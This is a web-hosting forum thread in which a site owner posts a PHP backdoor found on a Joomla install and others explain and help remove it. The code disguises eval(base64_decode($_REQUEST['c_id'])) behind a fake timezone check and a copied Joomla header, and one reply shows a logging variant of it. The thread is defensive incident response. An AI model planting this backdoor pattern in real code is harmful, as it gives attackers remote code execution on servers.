php Malware problem

[afradata]

Hi 2 all

Sorry my English is not good

i have a cpanel shared hosting . my server is in xlhost dc

I've received a few BroBot Malware complaints from bank of america

xlhost find user and file hve abuse and send me user information

Malware file is a php cod whene see url on browser open joomla administrator login page

php code file. please see it

<?php
function_exists('date_default_timezone') ? date_default_timezone_set('America/Los_Angeles') : @eval(base64_decode($_REQUEST['c_id']));
/**
* @version		$Id: index3.php 14401 2010-01-26 14:10:00Z louis $
* @package		Joomla
* @copyright	Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
* @license		GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/

$_REQUEST['tmpl'] = 'component';
include('index.php');
?>

please help me to finde this file on my serverand remove it or block it

Thanks All

 

[srpurdy]

Hi 2 all

Sorry my English is not good

i have a cpanel shared hosting . my server is in xlhost dc

I've received a few BroBot Malware complaints from bank of america

xlhost find user and file hve abuse and send me user information

Malware file is a php cod whene see url on browser open joomla administrator login page

php code file. please see it

<?php
function_exists('date_default_timezone') ? date_default_timezone_set('America/Los_Angeles') : @eval(base64_decode($_REQUEST['c_id']));
/**
* @version		$Id: index3.php 14401 2010-01-26 14:10:00Z louis $
* @package		Joomla
* @copyright	Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
* @license		GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/

$_REQUEST['tmpl'] = 'component';
include('index.php');
?>

please help me to finde this file on my serverand remove it or block it

Thanks All

Nothing looks unusal in that file. It's more likely a either a mysql injection, or the index.php file (or htaccess) So I would start by looking at the index.php file, and the .htaccess file.

Although that eval() function looks odd.. But it's only requesting infomation. So there has to be a connection to the index.php file

 

[brianoz]

Nothing looks unusal in that file. It's more likely a either a mysql injection, or the index.php file (or htaccess) So I would start by looking at the index.php file, and the .htaccess file.

Although that eval() function looks odd.. But it's only requesting infomation. So there has to be a connection to the index.php file

This is one of the newer tricks - they don't leave the code on the server, they just POST to the PHP file with, in this case, the code in the variable $_REQUEST['cid']. As you say, the code looks surprisingly benign, but it's not. It's like a permanent backdoor into the server!

One of the clever tricks is that this function name 'date_default_timezone' sounds like one of the PHP functions on the server. However, it's a function that never exists, so the base64_decode (carefully hidden off to the right of the line) is always run.

You can almost certainly safely remove that first line in it's entirety and you should then be secure.

 

[cPanelJamyn]

This is one of the newer tricks - they don't leave the code on the server, they just POST to the PHP file with, in this case, the code in the variable $_REQUEST['cid']. <snip> You can almost certainly safely remove that first line in it's entirety and you should then be secure.

Well, to clarify - if you remove the function_exists('date_default_timezone') ? line, the backdoor will be removed. It's still important to:

1. determine how they got in. Presumably you are running an old, exploitable version of Joomla (or an old plugin for the platform). It's critical that you keep it up to date, as it's a popular target with a lot of vulnerabilities.

2. clean up. Search all the files for that (or similar) lines. If they were smart, they'd install at least 3-4 backdoors in the hopes you'll miss one.

3. ensure all software is up to date. If you have Wordpress or Drupal or other PHP apps on the account(s), update those too.

4. reset your passwords. They got in once already, so make sure you have new passwords.

Ideally, you'd do a complete recreation of the account after a compromise (install new software, restore the DB data, etc), but I understand that's sometimes not possible.

 

[bibiloi]

This is one of the newer tricks - they don't leave the code on the server, they just POST to the PHP file with, in this case, the code in the variable $_REQUEST['cid']. As you say, the code looks surprisingly benign, but it's not. It's like a permanent backdoor into the server!

One of the clever tricks is that this function name 'date_default_timezone' sounds like one of the PHP functions on the server. However, it's a function that never exists, so the base64_decode (carefully hidden off to the right of the line) is always run.

You can almost certainly safely remove that first line in it's entirety and you should then be secure.

Modifing the php file to print what that c_id variable contains to something like that:

cat web/components/news2.class.bak.php
<?php
if(function_exists('date_default_timezone'))
{
date_default_timezone_set('America/Los_Angeles');
}
else
{
$ft = @fopen("/tmp/hacker.tmp","ab");
if($ft)
{
fwrite($ft,base64_decode($_REQUEST["c_id"])."\r\n\r\n");
fclose($ft);
}
@eval(base64_decode($_REQUEST['c_id']));
}

After a POST :

195.56.77.46 - - [08/Mar/2013:10:32:01 +0100] "POST /components/news2.class.bak.php HTTP/1.1" 403 15 "-" "Mozilla/5.0 Firefox/3.6.12"

this is what contains the /tmp/hacker.tmp file:

- snipped -

 

[afradata]

Please Help me

Can i block this cod @eval(base64_decode($_REQUEST['c_id'])); by mod_security

i recive Warnings from xlhost